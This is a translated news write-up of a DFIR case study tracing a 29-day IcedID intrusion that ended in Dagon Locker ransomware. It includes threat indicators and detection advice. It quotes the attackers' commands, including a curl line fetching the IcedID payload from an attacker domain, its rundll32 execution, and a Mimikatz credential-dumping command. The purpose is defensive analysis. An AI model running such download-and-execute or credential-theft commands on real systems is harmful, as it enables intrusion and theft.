Tracking a ransomware attack case | It took 29 days from initial vulnerability exploitation to final deployment of ransomware

Introduction: Cybersecurity experts carefully tracked the timeline of a sophisticated ransomware attack, which took 29 days from the initial exploit to the deployment of Dagon Locker ransomware.

Cybersecurity experts carefully tracked the timeline of a sophisticated ransomware attack, which took 29 days from the initial exploit to the deployment of Dagon Locker ransomware.

This case study not only illustrates the effectiveness and persistence of cybercriminals, but also highlights the ever-changing landscape of cyber threats organizations face today.

Evolution and Upgrade

The attack began with network penetration via IcedID. IcedID is a notorious malware that was originally designed for bank fraud but has since evolved into a versatile tool for wider cybercriminal operations.

The malware is spread via spoofed emails that trick employees into downloading malicious JavaScript files.

Once inside a system, IcedID establishes a foothold by communicating with command and control servers, laying the foundation for further malicious activity.

implement

Tool deployment

Over the next few days, the attackers deployed a variety of tools to maintain persistence and move laterally across the network.

Rclone, Netscan, Nbtscan, AnyDesk, Seatbelt, Sharefinder, and AdFind are used to scout the network environment and prepare it for the final payload.

This stage is critical because it allows attackers to map the network, identify valuable targets, and strategically plan ransomware deployment.

This case study provides a detailed analysis of each attack stage based on insights from the DFIR report.

Attackers initially gain access through IcedID malware, which is typically distributed via phishing emails containing malicious attachments or links.

The main goal of this phase is to establish a foothold within the network without raising alarms.

implement

After initial access, the malware permanently installs scripts on the host system, laying the foundation for the deployment of additional payloads and deeper network penetration.

When the user executes the downloaded JavaScript file Document_Scan_468.js, the following steps occur:

1. Use the curl command to create a bat file to download the IcedID payload from moashraya(.)com.

C:\Windows\System32\cmd.exe” /c echo curl https://moashraya(.)com/out/t.php –output “%temp%\magni.waut.a” –ssl no-revoke –insecure –location > “%temp%\magni.w.bat

2. Execute the batch script.

cmd.exe /c “%temp%\magnu.w.bat”

3. After downloading, the file magni.waut.a is renamed to magni.w.

cmd.exe /c ren “%temp%\magni.waut.a” “magni.w”

4. Use rundll32.exe, which executes the function scab using the parameter \k arabika752 in the downloaded and renamed file magni.w.

rundll32 “%temp%\magni.w”, scab \k arabika752

Attackers ensure their continued presence on the network by using sophisticated persistence mechanisms such as registry modifications and scheduled tasks.

The threat actor created multiple scheduled tasks on different servers to enable persistent execution of Cobalt Strike. Scheduled task files are created by the process injected by svchost.

As shown below, the scheduled task file is created by the process injected by svchost.

Scheduled task files are created by the svchost injection process

This allows them to maintain control of the infected system even during reboots or attempts at cleanup.

Privilege escalation

Attackers exploit system vulnerabilities and misconfigurations to gain higher levels of privileges.

When threat actors create new user accounts, they add them to privileged Active Directory groups.

Privileged Active Directory Group

Elevated privileges allow them to manipulate system processes and access restricted areas of the network.

Attackers employ a variety of techniques to avoid detection, including obfuscating their malware, disabling security measures, and using legitimate management tools.

IcedID injects itself into svchost.exe

These actions help maintain the stealth of the attack, allowing it to proceed unimpeded.

Cobalt Strike provides a set of tools for retrieving hashed credentials from the LSASS (Local Security Authority Subsystem Service) process, including the “logonpassword” command.

This command uses the Mimikatz module “sekurlsa::logonpasswords” to extract the credentials directly from system memory.

Sysmon correct, allows tracing access to LSASS memory

In order to effectively monitor and identify such unauthorized activities, the system monitoring utility Sysmon must be implemented and fine-tuned.

Properly configured Sysmon can monitor attempts to access LSASS memory, a critical step in detecting potential credential theft, as shown in the attached figure.

Access to credentials facilitates unauthorized access to systems and data, increasing an attacker's control over the network.

Once inside the network, attackers conduct surveillance to identify valuable assets and data.

During the execution phase detailed in this report, we observed the IcedID malware being injected into the parent process svchost.exe and subsequently performing credential extraction.

This behavior is an important observation linking the malware to unauthorized access to the LSASS process.

This information guides their subsequent actions and target selection in infected environments.

Lateral movement

Attackers use stolen credentials and tools to move laterally across the network.

To facilitate lateral movement across disparate systems, the threat actors exploited the “jump winrm” functionality in Cobalt Strike beacons, which leverages the Windows PowerShell Remote Protocol (MS-PSRP).

This approach emphasizes the sophisticated use of built-in network protocols to extend the attack scope.

Built-in network protocols expand attack scope

Extracted from the memory of a compromised server – shows the processes executed when a Cobalt Strike beacon performs this type of lateral movement.

Lateral movement allows them to expand their reach and compromise other systems.

collect

During the intrusion, the threat actors targeted and accessed multiple files related to the IT department.

Additionally, they dumped and exfiltrated Windows Security Event logs from domain controllers using PowerShell commands executed through Cobalt Strike beacons.

command and control

The extended duration and network instability during this intrusion resulted in a lack of some typically available network artifacts, resulting in potential gaps in the data.

IcedID's command and control traffic was only detected during the first two days of the intrusion. Instead, Cobalt Strike command and control traffic began the next day and continued throughout the intrusion.

Analysis of the Cobalt Strike configuration extracted from the previously mentioned PowerShell script revealed several tactics employed by the threat actors:

· They chose the legitimate Windows process gpupdate.exe to inject the Cobalt Strike shellcode.

· They exploited the Early Bird APC queue injection technique to bypass security measures.

· They attempted to disguise Cobalt Strike traffic as a legitimate connection to cloudfront.amazonaws.com.

· They configured three IP addresses to serve as command and control (C2) servers.

This allows them to send commands, deploy additional payloads and steal data. The data was exfiltrated to a server controlled by the attacker.

Breaches pose significant privacy and security risks, leading to potential data breaches and compliance issues. Deployment of Dagon Locker ransomware results in file and system encryption, operational downtime, and financial losses due to ransom demands and recovery costs.

The attack required a comprehensive incident response, including system recovery, enhanced security posture and regulatory reporting.

timeline

· Day 1: Entry via IcedID malware.

· Days 2-10: Establish persistence and privilege escalation.

· Days 11-20: Reconnaissance and lateral movement.

· Days 21-28: Data collection and staging of ransomware deployment.

· Day 29: Dagon Locker ransomware activated.

This attack exemplifies the speed and stealth of modern cyber threats. Organizations must enhance their cybersecurity framework, adopt proactive threat hunting practices, and ensure continuous monitoring to defend against such sophisticated attacks.

The detailed breakdown provided by the DFIR report not only illuminates specific attack vectors but also serves as an important learning tool for the cybersecurity community.

index

Atomic

IcedID
143.110.245(.)38:443
159.89.124(.)188:443
188.114.97(.)7:443
151.236.9(.)176:443
159.223.95(.)82:443
194.58.68(.)187:443
87.251.67(.)168:443
151.236.9(.)166:443
rpgmagglader(.)com
ultrascihictur(.)com
oopscokir(.)com
restohalto(.)site
ewacootili(.)com
magiraptoy(.)com
fraktomaam(.)com
patricammote(.)com
moashraya(.)com
 
Cobalt Strike
 
23.159.160(.)88
45.15.161(.)97
51.89.133(.)3
winupdate.us(.)to

Computed

Document_Scan_468.js
0d8a41ec847391807acbd55cbd69338b
5066e67f22bc342971b8958113696e6c838f6c58
f6e5dbff14ef272ce07743887a16decbee2607f512ff2a9045415c8e0c05dbb4
 
license.dat
bff696bb76ea1db900c694a9b57a954b
ca10c09416a16416e510406a323bb97b0b0703ef
332afc80371187881ef9a6f80e5c244b44af746b20342b8722f7b56b61604953
 
Riadnc1.dll
a144aa7a0b98de3974c547e3a09f4fb2
34c9702c66faadb4ce90980315b666be8ce35a13
9da84133ed36960523e3c332189eca71ca42d847e2e79b78d182da8da4546830
 
magni.w
7e9ef45d19332c22f1f3a316035dcb1b
4e0222fd381d878650c9ebeb1bcbbfdfc34cabc5
839cf7905dc3337bebe7f8ba127961e6cd40c52ec3a1e09084c9c1ccd202418e
 
magni.w.bat
b3495023a3a664850e1e5e174c4b1b08
38cd9f715584463b4fdecfbac421d24077e90243
65edf9bc2c15ef125ff58ac597125b040c487640860d84eea93b9ef6b5bb8ca6
 
update.dll
628685be0f42072d2b5150d4809e63fc
437fe3b6fdc837b9ee47d74eb1956def2350ed7e
a0191a300263167506b9b5d99575c4049a778d1a8ded71dcb8072e87f5f0bbcf

This article is translated from: https://gbhackers.com/hackers-tool-29-sabotage-ransomware-attack/ If reprinted, please indicate the original address